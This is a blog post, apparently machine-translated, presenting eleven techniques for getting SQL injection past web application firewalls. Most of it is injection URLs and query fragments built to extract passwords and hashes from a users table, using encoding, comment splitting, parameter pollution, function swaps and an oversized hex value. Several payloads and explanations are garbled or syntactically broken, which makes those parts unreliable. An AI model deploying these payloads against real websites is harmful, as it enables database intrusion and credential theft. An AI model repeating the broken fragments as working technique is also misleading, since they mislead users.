WAF bypass technology in SQL injection

1. Case-insensitive Bypass

This is very familiar to everyone, for some of the too garbage WAF effect is significant, such as blocking the union, then the use of Union and so on bypass.

2. Simple code Bypass

such as the WAF detection keyword, then we let him not detect it. For example, to test the union, then we use%55 that is U 16 encoding to replace U,union written%55nion, combined with case can also bypass some WAF, you can arbitrarily replace one or a few can.

There are also people in the MySQL injection, such as the table name or load file, the file name or indicate that the 16 encoding to bypass the WAF belongs to this category.

3. Comment Bypass

This is a relatively small scenario and applies to a WAF that simply filters out a dangerous statement without blocking our entire query.

01./?id=1+union+select+1,2,3/*

For example, for the above query, WAF filters a union and select, then we write a comment before the statement, let him the comments inside the filter out, does not affect our query.

So the bypass statement is:

01./?id=1/*union*/union/*select*/select+1,2,3/*

There is also an annotation-related bypass:

Like what:

01.index.php?page_id=-15/*! union*//*! select*/1,2,3,4 ...

You can see, as long as we put the sensitive words into the note, note that the front to add one!

4. Separating override Bypass

Or the above example, which applies to a WAF that uses regular expressions, detects all the sensitive words and doesn't care where you write, and filters a few.

We can separate the sensitive words by annotations, so that the WAF's regular does not work, and when the query is brought in, it does not affect our results.

01./?id=1+un/**/ion+sel/**/ect+1,2,3--

As for the rewrite bypass, which applies to the WAF filtering once, and as we upload the aaspsp horse principle, we can write something like ununionion. Once the union is filtered, our query is executed.

01.?id=1 Ununionion Select 1,2,3--

5.Http parametric contamination (HPP)

For example, we have this statement:

01./?id=1 Union select+1,2,3+from+users+where+id=1--

We can repeat the previous ID value to add our value to bypass, &id= will become a comma at query time:

01./?id=1 Union select+1&id=2,3+from+users+where+id=1--

This condition is more successful, depending on the specific WAF implementation.

Give an example of how to use:

01./?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users--

The specific analysis of the query is related to the background code writing.

For example, the server is written like this:

01.select * FROM table where a= ". $_get[' a ']." and b= ". $_get[' B ']." Limit ". $_get[' C ';

Then we can construct such an injection statement:

01./?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--

The final resolution is:

01.select * FROM table where a=1 union/* and b=*/select 1,pass/*limit */from users--

Can be seen, this way is actually more suitable for white box testing, and for the black box infiltration, it is more troublesome to use. But you can try it.

6. Using the logical operator Or/and bypass

01./?id=1+or+0x50=0x50

02./?id=1+and+ascii (Lower (Mid ((select+pwd+from+users+limit+1,1), 1, 1)) =74

By the way, explain the second sentence, starting from the innermost parenthesis, select+pwd+from+users+limit+1,1 this sentence is the first record of the PWD field from the users table, such as admin,

Then mid (the previous sentence), the first character of the admin is taken, that is, a,

Lower (the previous sentence) is to convert the character to lowercase,

Then ASCII is to convert a to ASCII code, see not equal to 74.

7. Compare operator substitution

Include! = does not equal,<> not equal to,< less than,> greater than, these can be used to replace = to bypass.

For example, the previous example, to determine whether it is 74, assuming = is filtered, then we can determine whether it is greater than 73, is not less than 75, and then know is 74. Many WAF will forget this.

8. Replace with function function

Substring () can be replaced with the functions of mid (), substr (), which are used to take a certain bit of a character string.

ASCII () encoding can be replaced with hex (), Bin (), which is the 16 binary and binary encoding. Benchmark () can be replaced with sleep (), both of which are used in delay-based blinds and have the opportunity to introduce them.

If even these are blocked, there is a new way:

SUBSTRING (SELECT ' password ') = 0x70

02.substr ((SELECT ' Password '), 0x70) =

03.mid ((SELECT ' Password '), 0x70) =

These three, for example, are judged by the value of the first character from the password, which can be used:

01.STRCMP (Left (' password ', 1), 0x69) = 1

02.STRCMP (Left (' password ', 1), 0x70) = 0

03.STRCMP (Left (' password ', 1), 0x71) = 1

To replace, left is used to take the value of the 1-bit string, strcmp is used to compare two values, if the comparison result is equal to 0, the left side is 1, otherwise 1.

and Group_concat and Concat and Concat_ws, which I have said before, can replace each other.

9. Blinds without OR AND and

For example, there is an injection point:

01.index.php?uid=123

And, or is filtered, in fact there is a more direct way, we directly modify the 123 generated for our statement:

01.INDEX.PHP?UID=STRCMP (Left ((select+hash+from+users+limit+0,1), 1), 0x42) +123

123 when the page is correct, we are now blind guess the first bit of hash, if the first bit equals 0x42 is B, then the strcmp result is 0,0+123=123, so the page should be correct. Otherwise, it is not B, so guess, don't use and and OR.

10. Parentheses

01./?id=1+union+ (Select+1,2+from+users)

For example, the above article was intercepted by a WAF. You can try adding some parentheses:

01./?id=1+union+ (SELECT+1,2+FROM+XXX)

02./?id= (1) Union (SELECT (1), Mid (hash,1,32) from (users)

03./?id=1+union+ (SELECT ' 1 ', concat (login,hash) from+users)

04./?id= (1) Union ((((((((1), Hex (hash) from (users)))))))

05./?id= (1) or (0x50=0x50)

11. Buffer Overflow Bypass

This is from a foreign blog to see:

01.id=1 and (select 1) = (select 0xAAAAAAAAAAAAAAAAAAAAA) +union+select+1,2,version (), 4,5,database (), User (),

8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

02.,27,28,29,30,31,32,33,34,35,36–+

Where 0xAAAAAAAAAAAAAAAAAAAAA here a more the better, generally requires more than 1000.

This article is from "My World, I am the director." "Blog, be sure to keep this provenance http://biock.blog.51cto.com/4643304/1643918

WAF bypass technology in SQL injection